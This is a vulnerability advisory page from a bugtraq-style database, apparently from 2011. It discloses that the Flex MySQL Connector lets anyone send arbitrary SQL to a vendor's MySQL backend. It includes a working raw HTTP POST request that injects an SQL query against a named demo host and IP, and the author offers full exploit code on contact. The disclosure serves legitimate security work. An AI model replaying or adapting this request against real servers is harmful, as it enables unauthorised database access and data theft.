|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : ~Fyodor SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$ $$$ Flex MySQL Connector Remote SQL Execution Exploit $$$ $$$ $$$ $$$ || License: Commercial $$$ $$$ || Language: English $$$ $$$ Flex MySQL Connector || Cost: $45.00 $$$ $$$ || Platform: Flash Player 9 | Flash Player 10 $$$ $$$ || Demo: http://flexappsstore.com/flexapps/demo/mysql/ $$$ $$$ $$$ $$$ || Name: ~Fyodor (aka DungPQ) $$$ $$$ Credit || Email: quangdung181188[at]gmail.com $$$ $$$ || Location: Hanoi, Vietnam $$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$ [$] Vulnz Description : Flex MySQL Connector is a Flex Component from FlexAppsStore, which allow run SQL from ActionScript via PHP backend (Flash <=> PHP <=> MySQL). But anybody can modify the SQL command in Request packet and send to PHP backend, it means anybody can query SQL commands to victim's MySQL server => OMG ! [$] Exploitz : Send Example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/ --------------------------------------------------------------------------- -------- > Dest.IP = 66.147.242.177 > Dest.PORT = 80 ---[Request BOF]--- POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1 User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10 Host: www.flexappsstore.com Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: en-US,en;q=0.9 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf Connection: Keep-Alive, TE TE: deflate, gzip, chunked, identity, trailers Content-Length: 89 Content-type: application/x-www-form-urlencoded fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1 %20FROM%20tbl%5Fbigbig ---[Request EOF]--- (Oh yeah, SQL command is SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig) [$] PS: I don't give full PoC sourcecode. You can make your PoC by PHP (using fsockopen(), cUrl, ...) but if you want, contact me. ^_^ [$] ~Fyodor - The Still Lake Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |